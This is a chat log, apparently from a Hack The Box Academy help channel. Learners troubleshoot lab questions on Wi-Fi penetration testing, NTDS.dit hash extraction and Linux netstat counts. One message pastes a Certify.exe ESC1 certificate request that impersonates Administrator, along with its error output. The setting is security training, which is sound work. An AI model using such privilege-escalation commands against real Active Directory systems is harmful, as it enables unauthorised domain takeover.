yeah I got around it... Just wanted to mention it if someone was interested in adjusting it
Wi-Fi Penetration Testing Basics - Skills Assessment - last question
Connect to the WiFi network and submit the flag found at IP 192.168.2.1.
For some reason i cant connect. What do i miss? I've tried with config files, via GUI and Network manager. Got the SSID and password (these are the first two questions).
Anyone any hints?
try follow the path
cd /home
cd htb-ac......
cd Desktop
etc and find it
or you find
find / -type f -name "listname.txt"
it will show you the path to the list
yes I found it, my point was just that the path in the instructions was incorrect. But nevermind, I'll continue the course now. Thanks 🙂
It's not a mistake in module I mean, I guess you couldn't find it bc of "htb-acxxxxxx" part
Can you show the path you found and path in module, what's the diff?
Ok, path mentioned in the course: /home/htb-acxxxxx/Desktop/Useful Repos/SecLists/Discovery/Web-Content/burp-parameter-names.txt
Correct path (at least in my box instance): /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt
I have no "Useful Repos" directory under ~/Desktop
Okay then, you are right. Write a report to the #1234357888114364508 with typo tag
Oh, okay
My config file:
||network={
ssid="SSID"
psk="password"
key_mgmt=WPA-PSK
}||
I have not done this module yet, but I believe you can read the module again and find smth useful
especially connect part
Yes and i've tried all those methods but idont get the same results as i did with that module.
try googling it, there are a lot of tutorials on how to hack wifi, maybe you will find smth useful
ask chatgpt 
Also the GUI option isnt available after bruteforcing. if i reboot the VM i can search for hidden networks via the GUI but i cannot connect.
Asked GPT before i came here and those results also end in error 😦 most of them are equal to the module steps
if still doesn't work reload your instance, you could break something on it
it's tier 3 modules
Hi Team, I was wondering if someone could point me in the right direction. I'm on the question "Submit the NT hash associated with the Administrator user from the example output in the section reading." in the Password Attacks, Attacking Active Directory & NTDS.dit module. I've reviewed the on-screen output and the relevant NT hash listed for the Administrator account and cracked it with Hashcat, and the password cracked is not the correct one. I've reviewed all other sections of the material listed and can't find the correct NT hash to crack, I feel like I'm going insane. The hash I'm cracking is 64f12cdd*****. If anyone could give me a nudge in the right direction I'd be grateful, thank you
It is worth it but very hard to get into unless you have a Computer Science or EE background. This said, keep discussions like these out of the #modules channel, since it's solely for help regarding academy modules.
Roger
It's not asking you to crack just submit the hash as the answer.
i feel stupid now lol, thank you
<@&861185840277487616> I'm not sure, I guess its not allowed here
Hey Bobby.b welcome!
This isn't a job board. It's a channel dedicated to discussion around modules on the HTB academy. I believe there is one dedicated to attacking wordpress which may be something you find useful. Otherwise, verify an account and you can ask the actual questions in #general or potentially #web.
I'm on Linux Fundamentals and I'm stuck on the "What is the name of the network interface that MTU is set to 1500?" and "Which kernel version is installed on the system? (Format: 1.22.3)". The answers from ifconfig/uname -v are wrong for some reason... Can someone help?
It's pretty copy and paste from the section with minor changes
hi guys is planning to GET CCNA + CTPS a good idea for job? like cybersec/pen test?
A hint? Did try to replicate all the steps learned but still not able to connect to that hidden wifi 😢
Ah... Now I see it's the SA
Have you tried bypassing MAC Address filtering?
module: Windows Attacks & Defense
PKI - ESC1
when i executed this comand PS C:\Users\bob\Downloads> .\Certify.exe request /ca:PKI.eagle.local\eagle-PKI-CA /template:UserCert /altname:Administrator. i get an error :
[X] Error sending the certificate request: System.Runtime.InteropServices.COMException (0x800706BA): CCertRequest::Submit: The RPC server is unavailable. 0x800706ba (WIN32: 1722 RPC_S _SERVER_UNAVAILABLE) at CERTCLILib.ICertRequest3. Submit(Int32 Flags, String strRequest, String strAttributes, String strConfig)
at Certify.Cert. SendCertificateRequest(String CA, String message)
at Certify.Cert. RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, Boolean install)
Anyone have/know of a link that would immediately crash the connected local internet?
yeah, indeed.com
Anyone know the basics of hacking to tutor me?
Guys a question, maybe an obvious one but why do we connect with the vpn by using openvpn if we (in some modules) directly interact with the target machine's IP? Is it to create a secure and encrypted tunnel while we interact with the machine? Trying to see if i understand the why.
You connect with the VPN when you are using your own VM. If you using the pwnbox then its already connected to the network that the target machine is in so you don't need it in that case.
Thanks for the answer. This i understand but my question was more pertaining to the why, is it to create a secure tunnel with point A and point B? And thus encrypting the traffic in between devices?
Yes, this ensures that any data transmitted between you and the target is encrypted, preventing eavesdropping or interception by third parties.
So my thought pattern was correct, thanks for this!
Possibly a dumb question and I apologize, but I'm currently in the Linux fundamentals module I'm just starting. I'm in the create a time section but when I try to run sudo mkdir /etc/system etc.. it asks for the sudo password for htb-student. I tried the password I used to connect with my VM on the ssh but it says I'm not on the sudoers file and will be reported. Should I just try this block using the pwn box is that my issue?
you can do it on pwnbox but, ssh doesnt need sudo to work here
you also need to add your user to sudoers file for future sudo commands tho
Ah okay I probably missed that step. Where can I find the directions to do that?
I'm on a vm
dm a pic of the ssh command
I may have been confusing with my question. I've successfully made the ssh connection with the htb login, but I'm trying to make a directory for the Task Scheduling section, and when I try the mkdir command it's asking for a sudo password
do you need to create a directory for that section?
are u supposed to create it?
i thought i was supposed to follow along with these
read the question
I have a question I'm really struggling with on a linux fundamentals module. The question is "How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)"
I ran: netstat -4tln | grep -v '127.0.0.1' | grep LISTEN | wc -l
and the number was 8. But the answer was incorrect.
oh you mean you are following along and you havn't reached the question yet? Some stuff you can't follow along one-to-one in the pwn box
i think thats more on your own machine if you wanted to set that up
@old oasis that makes sense thanks for the assistance
try subtracting your answer by one and entering that
The way I understood it was it lists one of the services twice
you can see that if you see the list in column and not just the number
It's kind of breaking my brain as to why it would list it twice and how would someone with little to no experience know this.
That's my mistake, i should have done column
man, there's been a lot of stuff they want us to answer and they don't teach the best way to find it till a section or 2 later haha
kinda frustrating at times
still fun though
it is really fun learning, but yes, incredibly difficult at times.